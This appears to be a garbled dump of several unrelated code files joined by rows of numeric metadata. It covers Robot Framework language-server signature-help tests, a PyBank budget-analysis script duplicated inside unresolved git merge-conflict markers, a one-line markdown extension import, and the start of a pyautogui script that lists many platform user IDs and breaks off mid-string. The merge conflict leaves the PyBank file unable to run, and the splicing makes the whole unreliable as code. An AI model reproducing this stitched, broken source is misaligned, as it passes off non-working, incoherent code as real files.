assert docs["kind"] == MarkupKind.Markdown
assert "Log" in docs["value"]
data_regression.check(result)
def test_signature_help_parameters_in_1st_eol(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_1st(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_1st_single_space(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_2nd_two_spaces(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_2nd_eol(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_2nd(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 arg2""",
)
lineno, col = doc.get_last_line_col()
for i in range(6):
check_col = col - i
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on i: {i}")
def test_signature_help_parameters_na(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 arg2""",
)
# Checking `Some keywor|d | arg1 arg2`
lineno, _col = doc.get_last_line_col()
for check_col in [16, 17]:
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on col: {check_col}")
def test_signature_help_parameters_first(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 arg2""",
)
# Checking `Some keyword | a|rg1 arg2`
lineno, _col = doc.get_last_line_col()
for check_col in [18, 19, 20, 21, 22]:
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on col: {check_col}")
def test_signature_help_parameters_switch(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg2=m""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_star_arg_keyword(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_over_keyword(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val""",
)
lineno, _col = doc.get_last_line_col()
for check_col in range(4, 17):
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on col: {check_col}")
def test_signature_help_parameters_keyword_arg_keyword(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3} &{arg4}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar some=1 another=2""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_name_after_stararg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3} &{arg4}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar some=1 anot""",
)
# Note: must match last because it's after a keyword arg.
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_only_stararg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Keyword only star
[Arguments] @{arg3}
Log To Console ${arg3}
*** Test Cases **
Normal test case
Keyword only star arg1=22 this is ok""",
)
lineno, col = doc.get_last_line_col()
col -= len("1=22 this is ok")
completion_context = CompletionContext(
doc, workspace=workspace.ws, line=lineno, col=col
)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_named_and_stararg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Keyword only star
[Arguments] ${arg1} @{arg3}
Log To Console ${arg3}
*** Test Cases **
Normal test case
Keyword only star arg1 arg1=22 this is ok""",
)
lineno, col = doc.get_last_line_col()
col -= len("1=22 this is ok")
completion_context = CompletionContext(
doc, workspace=workspace.ws, line=lineno, col=col
)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_name_star_even_with_eq(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar some=1 anot""",
)
# Note: must match last because it's after a keyword arg.
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_star_arg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case_argspec", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Settings ***
Library case_argspec.py
*** Test Cases ***
Check
arg_with_starargs arg1 arg2 in_star in_star2""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_keyword_arg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case_argspec", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Settings ***
Library case_argspec.py
*** Test Cases ***
Check
arg_with_starargs arg1 arg2 in_star in_star2 some_val=22""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_misleading_match_1(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Keywords ***
Keyword named and keyword
[Arguments] ${arg1} @{arg3} &{arg4}
Log to console 22 @{arg3} &{arg4}
*** Test Cases **
Normal test case
Keyword named and keyword arg1=ok arg3=keyword arg4=arg4""",
)
lineno, col = doc.get_last_line_col()
# We're actually matching the kwargs, not star args...
col -= len("3=keyword arg4=arg4")
completion_context = CompletionContext(
doc, workspace=workspace.ws, line=lineno, col=col
)
data_regression.check(signature_help(completion_context))
def test_signature_help_library_basic(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Settings ***
Library Collections""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
sig_help = signature_help(completion_context)
documentation = sig_help["signatures"][0].pop("documentation")
assert documentation["kind"] == "markdown"
assert "Collections is Robot Framework's standard library" in documentation["value"]
data_regression.check(sig_help)
def test_signature_help_library_with_params(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
from robotframework_ls.robot_config import RobotConfig
config = RobotConfig()
config.update(
{"robot": {"libraries": {"libdoc": {"needsArgs": ["LibWithParams"]}}}}
)
libspec_manager.config = config
workspace.set_root("case_params_on_lib", libspec_manager=libspec_manager)
doc = workspace.put_doc("case_params_on_lib.robot")
doc.source = """
*** Settings ***
Library LibWithParams some_param=foo"""
completion_context = CompletionContext(doc, workspace=workspace.ws)
sig_help = signature_help(completion_context)
documentation = sig_help["signatures"][0].pop("documentation")
assert documentation["kind"] == "markdown"
# assert "Collections is Robot Framework's standard library" in documentation["value"]
data_regression.check(sig_help)
def test_signature_help_library_with_params_active_arg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case_params_on_lib", libspec_manager=libspec_manager)
doc = workspace.put_doc("case_params_on_lib.robot")
doc.source = """
*** Settings ***
Library AnotherLibWithParams param1=foo param2=bar"""
completion_context = CompletionContext(doc, workspace=workspace.ws)
sig_help = signature_help(completion_context)
documentation = sig_help["signatures"][0].pop("documentation")
assert documentation["kind"] == "markdown"
data_regression.check(sig_help)
| 31.761168
| 90
| 0.702191
| 2,120
| 18,485
| 5.866038
| 0.080189
| 0.096172
| 0.075587
| 0.088775
| 0.930926
| 0.921277
| 0.918865
| 0.90825
| 0.908009
| 0.908009
| 0
| 0.013444
| 0.199243
| 18,485
| 581
| 91
| 31.815835
| 0.826713
| 0.023641
| 0
| 0.703704
| 0
| 0
| 0.066467
| 0.003351
| 0
| 0
| 0
| 0
| 0.033951
| 1
| 0.070988
| false
| 0
| 0.148148
| 0
| 0.219136
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b065e78c44f1201e4ab36e0d1276a9494e1810d
| 6,548
|
py
|
Python
|
PyBank/main.py
|
kekelee0714/python_challenge
|
102ef56690fb896def98b525b73d4e77459d9a98
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
kekelee0714/python_challenge
|
102ef56690fb896def98b525b73d4e77459d9a98
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
kekelee0714/python_challenge
|
102ef56690fb896def98b525b73d4e77459d9a98
|
[
"ADSL"
] | null | null | null |
<<<<<<< HEAD
#load csv
import os
import csv
#Path to collect data
budget_data_csv ="C:/Users/Keke/git/python_challenge/PyBank/Resources/budget_data.csv"
#define variables
totalmonths=0
#set total as integer
nettotalamount=0
#calculate changes of each date
netmonthlychange=[]
#set first value as 0 from previous row
original = 0
averagechange=0
a=0
#set variables as list with "" reps date and numbers as the only value in the list
Gincrease= ["", 0]
Gdecrease= ["", 999999999999]
#read csv file
with open(budget_data_csv) as csvfile:
csvreader=csv.reader(csvfile,delimiter=",")
#skip header line to start from row 2
csv_header=next(csvfile)
#title of hw
print(f"Financial Analysis")
#print a new line \n
print("\n-------------------------------------")
#loop the numbers
for row in csv.reader(csvfile):
#date=row[0]
#profitloss=row[1]
#next row value is value in previous row add next row value
totalmonths = totalmonths+1
#sum incremental values
nettotalamount = nettotalamount + int(row[1])
#nettotalamount+= int(totalmonths
#calculate average change, if there is no value before first row or value is 0
if original == 0:
#no original value exists
#netmonthlychange.append(0) starts from 0 is added to the column in the file
#original which is 0 equals to the new row value
original = int(row[1])
else:
#original value exists, the new row value subtract previous row value is the difference
a = int(row[1]) - original
#append the net monthly change as a column
netmonthlychange.append(a)
original = int(row[1])
#if the value in net monthly change is greater the the only value, then column [0] is date column, column 2 [1] with greatest increase is value a from net monthly change
if a > Gincrease[1]:
Gincrease[0] = row[0]
Gincrease[1] = a
if a < Gdecrease[1]:
Gdecrease[0] = row[0]
Gdecrease[1] = a
#calculate the average of changes in total row
averagechange = sum(netmonthlychange)/len(netmonthlychange)
print(f"Total Months:{totalmonths}")
print(f"Total:${nettotalamount}")
#print(netmonthlychange)
#format average change to 2 decimal
print(f"Average Change:${averagechange:,.2f}".format(averagechange))
# [0] is date value, [1] is max or min value in the list
print(f"Greatest Increase in Profits:{Gincrease[0]}:(${Gincrease[1]})")
print(f"Greatest Decrease in Profits:{Gdecrease[0]}:(${Gdecrease[1]})")
# Generate Output Summary
text =(
f"Financial Analysis\n"
f"----------------------------\n"
f"Total Months: {totalmonths}\n"
f"Total: ${nettotalamount}\n"
f"Average Change: ${averagechange:.2f}\n"
f"Greatest Increase in Profits: {Gincrease[0]} (${Gincrease[1]})\n"
f"Greatest Decrease in Profits: {Gdecrease[0]} (${Gdecrease[1]})\n")
# Export the results to text file
saveFile= open('C:/Users/Keke/git/python_challenge/PyBank/analysis/saveFile.txt', 'w')
saveFile.write(text)
=======
#load csv
import os
import csv
#Path to collect data
budget_data_csv ="C:/Users/Keke/git/python_challenge/PyBank/Resources/budget_data.csv"
#define variables
totalmonths=0
#set total as integer
nettotalamount=0
#calculate changes of each date
netmonthlychange=[]
#set first value as 0 from previous row
original = 0
averagechange=0
a=0
#set variables as list with "" reps date and numbers as the only value in the list
Gincrease= ["", 0]
Gdecrease= ["", 999999999999]
#read csv file
with open(budget_data_csv) as csvfile:
csvreader=csv.reader(csvfile,delimiter=",")
#skip header line to start from row 2
csv_header=next(csvfile)
#title of hw
print(f"Financial Analysis")
#print a new line \n
print("\n-------------------------------------")
#loop the numbers
for row in csv.reader(csvfile):
#date=row[0]
#profitloss=row[1]
#next row value is value in previous row add next row value
totalmonths = totalmonths+1
#sum incremental values
nettotalamount = nettotalamount + int(row[1])
#nettotalamount+= int(totalmonths
#calculate average change, if there is no value before first row or value is 0
if original == 0:
#no original value exists
#netmonthlychange.append(0) starts from 0 is added to the column in the file
#original which is 0 equals to the new row value
original = int(row[1])
else:
#original value exists, the new row value subtract previous row value is the difference
a = int(row[1]) - original
#append the net monthly change as a column
netmonthlychange.append(a)
original = int(row[1])
#if the value in net monthly change is greater the the only value, then column [0] is date column, column 2 [1] with greatest increase is value a from net monthly change
if a > Gincrease[1]:
Gincrease[0] = row[0]
Gincrease[1] = a
if a < Gdecrease[1]:
Gdecrease[0] = row[0]
Gdecrease[1] = a
#calculate the average of changes in total row
averagechange = sum(netmonthlychange)/len(netmonthlychange)
print(f"Total Months:{totalmonths}")
print(f"Total:${nettotalamount}")
#print(netmonthlychange)
#format average change to 2 decimal
print(f"Average Change:${averagechange:,.2f}".format(averagechange))
# [0] is date value, [1] is max or min value in the list
print(f"Greatest Increase in Profits:{Gincrease[0]}:(${Gincrease[1]})")
print(f"Greatest Decrease in Profits:{Gdecrease[0]}:(${Gdecrease[1]})")
# Generate Output Summary
text =(
f"Financial Analysis\n"
f"----------------------------\n"
f"Total Months: {totalmonths}\n"
f"Total: ${nettotalamount}\n"
f"Average Change: ${averagechange:.2f}\n"
f"Greatest Increase in Profits: {Gincrease[0]} (${Gincrease[1]})\n"
f"Greatest Decrease in Profits: {Gdecrease[0]} (${Gdecrease[1]})\n")
# Export the results to text file
saveFile= open('C:/Users/Keke/git/python_challenge/PyBank/analysis/saveFile.txt', 'w')
saveFile.write(text)
>>>>>>> 97012a5334b31988da5776f6a60bc53f1646e686
saveFile.close()
| 30.598131
| 177
| 0.633323
| 870
| 6,548
| 4.748276
| 0.145977
| 0.017429
| 0.013556
| 0.012588
| 0.986202
| 0.986202
| 0.986202
| 0.986202
| 0.986202
| 0.986202
| 0
| 0.028681
| 0.243891
| 6,548
| 214
| 178
| 30.598131
| 0.805696
| 0.361637
| 0
| 0.959184
| 0
| 0
| 0.324193
| 0.170832
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.040816
| null | null | 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2b2a8d2f1cd6bf4fffe70b1a22108f94c6e975da
| 46
|
py
|
Python
|
markdown_strikethrough/__init__.py
|
codejamninja/markdown-strikethrough
|
7777da3c0e801328c31faeff486356bf20d12078
|
[
"MIT"
] | 2
|
2019-09-09T03:54:15.000Z
|
2020-08-08T20:44:16.000Z
|
markdown_strikethrough/__init__.py
|
codejamninja/markdown-strikethrough
|
7777da3c0e801328c31faeff486356bf20d12078
|
[
"MIT"
] | 1
|
2020-08-08T20:44:34.000Z
|
2020-08-11T19:52:36.000Z
|
markdown_strikethrough/__init__.py
|
codejamninja/markdown-strikethrough
|
7777da3c0e801328c31faeff486356bf20d12078
|
[
"MIT"
] | 1
|
2020-08-07T14:00:00.000Z
|
2020-08-07T14:00:00.000Z
|
from .extension import StrikethroughExtension
| 23
| 45
| 0.891304
| 4
| 46
| 10.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b2ae429014f1501359c41d45624e957ae5aab18
| 26,275
|
py
|
Python
|
get_person_json.py
|
nameoruser/qianshanghua_tech_open
|
f29d829bc0957b7aff5e4335815f79a1d6f00482
|
[
"MIT"
] | null | null | null |
get_person_json.py
|
nameoruser/qianshanghua_tech_open
|
f29d829bc0957b7aff5e4335815f79a1d6f00482
|
[
"MIT"
] | null | null | null |
get_person_json.py
|
nameoruser/qianshanghua_tech_open
|
f29d829bc0957b7aff5e4335815f79a1d6f00482
|
[
"MIT"
] | null | null | null |
import pyautogui
userIds=["563f28159eb5785cf3ff166c","57da039b5e87e7060078bd61","5cff5b5e0000000005001da2","597a92ff5e87e72aabdbfb68","566ae0e050c4b472ce971b00","5a0172ef4eacab059a3a9c96","54cdc001b4c4d615fc2c95ec","56585ef8e00dd87ff58fdbd8","58c740786a6a6901380c8480","55b99885e4b1cf545ecf9fce","5a2f4cb611be1021706678ef","5a9a74dd11be1053476212dd","5757c6546a6a6967b0730cad","5a9a3b754eacab47c3680df3","5571cf185894466e59c566f3","5655cb4344760876429b06e0","5c4a9b60000000001102a270","56ab5a695e87e733fe4bda44","5a7d3eec11be1021babbad85","5af67a23f7e8b97f0b7b04b8","5901ea6a50c4b46ce1182469","56d4511f1c07df32ddb07c9a","5bdd03f84c8ea300013ad4b2","5ab9fc3911be10774482ae0f","5bc6a5284884420001879b77","5df1a2b5000000000100a24d","5adc140911be1034034992eb","598d00d650c4b463941d63cc","5fd1c6c70000000001005681","5bcfed37f7e8b955ad4e916c","5a609d06e8ac2b4a9ce0c79b","5ce9df3f0000000011012ccc","57b3d74750c4b4624311f37e","5e613a6c0000000001004cf1","5a0bab2911be104f78a9230a","599f81f982ec391ca874a0d2","55d6d2b3a75c9544daac8058","57fd60c182ec390c1e0f6cb5","54eb29e4b4c4d650c7732980","55af65c9b7ba224c5ed8f6d3","555ee08da75c9576181cb63a","5ae28f464eacab3f46af145a","5a06d5b94eacab1c49c097d3","5995cdb382ec391ce28fbeb7","572161431c07df59c9d94975","5e8da3290000000001002d8a","565be62c82ec395615edacdb","5b0acec6e8ac2b1d53fa311b","5b5c0d33f7e8b90468fedd57","591acb5050c4b476602a3b2d","5a31e26fe8ac2b040ac04c85","5cd27dc8000000001000e5f0","552e10504fac63071dd3a4c5","5cff3a8500000000100012ce","5bba31d1ef3da50001c87bc1","5af59aa7e8ac2b7ae517f4a7","5a922caf4eacab36f1ad3346","599bc4f782ec390211a326e3","5d16f0a70000000012017775","598ef91a50c4b4689e942bb1","5539f269a46e962ef6005f9b","5dce45ad000000000100a111","5ddb43310000000001009856","5754fc7fbd0da54dda1a6896","5b5c91394eacab2dc2e4b67b","5a5eb0be11be105e04c4219c","5a8175b34eacab76003f5fb6","5f0e92d40000000001006b4f","5a8ece36e8ac2b259e57c91e","5c5bc879000000001801ed22","5a9679f611be1001e369ced3","58a5cb7c50c4b42857d166df","5617104562a60c09001dc969","5970495050c4b440fab52a1e","5cac275000000000120110cc","557160a024caa94557abfcac","5b63c87a08c322000140bed4","5480c804d6e4a9617b3014c4","5d2c3ff700000000120122ce","5d669cb1000000000101a0c5","56a895696a6a697ddc45719d","579b0c3b5e87e722a8af1610","59c747ee51783a0e35f879fa","5cdf4e9300000000170309e4","57b3254582ec3927d6949683","53356c0cb4c4d6656353a716","5d28384b00000000110366f7","5c035b0a00000000050046dc","581c976b82ec394bf0ba13af","5a4b93b34eacab3dc234c586","5cce4ce5000000001002027b","5858ebcc50c4b4147db4ed85","5976f9946a6a6904e6bde0ab","59dc26d044363b68d30f96ee","5bf7d30643e93c0001a852b8","5e65f4de0000000001004de0","598d61d86a6a692151a604cc","5c53fe600000000012038495","5657a8da9eb5783699f75da6","588e060a5e87e725587b0c9b","5ef800fa00000000010045d6","5a50e0984eacab1bfc31087f","5bf3d856ca31f80001b035cf","5e0082300000000001007219","5a4ba04ae8ac2b786b4eaf31","5a7ed930e8ac2b3cc82471e6","55e08eb6f5a26310fe15ada0","55037bd24fac637a9e80c750","54e8ac524fac63087d232070","5c33530300000000050115c6","5a0327334eacab720e5c713d","5d3571b0000000001603950a","5ac0f50f4eacab533a46a1f3","5a6ac91be8ac2b0cf57a50ec","5dd27576000000000100911f","5483b6e0e779895b7a18dbcf","5fabeded0000000001000bf9","59f6f411e8ac2b675f255952","5ac073f111be10046a0a023e","5ab0f1844eacab5fca6a0d65","5a1e2c62e8ac2b65158d0d72","5b69064f8f77470001f76cef","5b091bb74eacab61e4a9d0fe","5c96292d0000000011012730","5bfd37bb44363b1be89a8fe6","55701259e4b1cf643bc616ca","56af7a795e87e707bdc12a24","59effbc4e8ac2b2a3d82343a","5806b64682ec39270c247826","55fba5ca67bc656d0f39452b","57f2141e82ec396fac202951","55845e4262a60c325b608777","5aa4974be8ac2b1056ae133f","5ad9e2bde8ac2b42af7c3c3a","5bb236857d87110001e001c5","57ae9e2082ec396b21793684","5908181382ec397a00393ba3","5eaa701c0000000001006489","5c94bd3400000000160124bb","59ed4a1511be104fc73f36da","571f70d984edcd1213d213e2","57c9072e82ec392a4f737b12","5832b75a82ec396f2bea5d71","59166d8782ec397fbfd6b8e2","57f63af1bd0da55096c5e7f8","5ddba4e00000000001007335","5cdbb6b70000000012010d2f","5655892fe58d1344c0a2012f","5a320b0a11be102e5eb9b687","5e047cf200000000010055b4","5a353395e8ac2b7890db40b6","562f7175a40e1863293f9f52","5721db9084edcd524b9a8d61","5a8a30864eacab147a5dfd83","5936447382ec394236429ffe","5acdd212e8ac2b3476131a40","54f30c05b4c4d61b230995d4","596a31495e87e769bf0147af","5593d4d7b7ba224230748099","5837b6b06a6a6970cd2a47ea","5e8ed5dc000000000100bdbb","5a6eb5c111be1025c07e36a3","578f3c365e87e774dffe9000","5ca18842000000001001b7c1","531c1180b4c4d67408811a20","5dcb9feb000000000100999a","5eba3f0c0000000001006a98","5cb712f100000000100165f7","5e92a01b000000000100890e","5f0dc7a3000000000100097e","5ca6377b00000000160113cf","5837a6e150c4b40c2616f999","54ed94264fac632d92b853f7","54e722dad39ea214c11ebbdc","555cadf8b7ba227688cb4512","5888146c50c4b4689bf36e73","5b4b5778e8ac2b2eb4caee1d","5cff7d150000000016036964","560a5c4f484fb6036a169a12","5873544d5e87e7416aa1db4e","5a52d2aa11be1051a8fc03a3","565151199eb578461e4fd582","587e0c595e87e72c8e2ef1db","5a7717b4e8ac2b2b060b9526","59f048d44eacab475bee4098","56c1e4f8b8c8b45044e6c4fe","57f840de5e87e77b344d51fb","54d8efa52e1d9370188360f4","5d0af5120000000016034bfd","5a64aab811be106cfd490ce1","554d64984fac6319f93d3143","5a71275011be102a9e773d90","5e68bdb8000000000100ba06","5b5d8a604eacab24d8cb66aa","54d80a4a2e1d9366f1fc8c1a","579f66b682ec392318dad198","5af3be9fe8ac2b2a387db3b5","5a424d6c11be10029e6d503f","5ba84580a5bcc00001ec1ce1","58f0a79c6a6a6945d25fa1ba","5d072ed0000000001101ff74","5b309a09e8ac2b01364e3793","5941db1a50c4b436a21b0c6a","5bb36db5f2407b0001560e2d","5a7b2191e8ac2b04599a1510","5821cf725e87e729c9728029","5586a701484fb66a82219c1b","5e5cb766000000000100b8b8","5a68599ce8ac2b02d75eaf7a","5c935a050000000010014343","58938c4882ec3955e302b5c4","5c4711520000000010032881","5b436c3111be1002d61eac9f","58ef9a765e87e74cf10eca20","56356bdbe00dd87ff3d9adc4","5c0e326e000000000703b08c","5c167d2300000000050314f2","58fabdae82ec397d484fa6ca","57210827aed758497fd68a3e","5a9ac646e8ac2b796565f73b","56a0543acb35fb2225975fd2","5c25c4c5000000000502790d","5612accf3f95a31870230fe1","598fe73e5e87e70500b899af","5f2906c5000000000100922f","5888b99050c4b45fb6d3502b","5f58d6e5000000000100b637","5abcaf654eacab3b61830e61","5996f44082ec3909818fbf7b","5790ec513460943aef6968da","5d0781040000000012033321","5c176ebc000000000501320e","568ba6675e87e7268f5ec590","57a17b2a50c4b462bc6b4e87","594dcf4c5e87e74591d7b0ea","55b85282e4b1cf754eaa9209","6033d68a000000000101ef10","5923c6aa3460940cd30734b8","5a34deabe8ac2b1eff800a45","5b5809fb11be1002b2a47d33","57948aad82ec39283e3b9522","598a9c8850c4b46a23221f55","5a3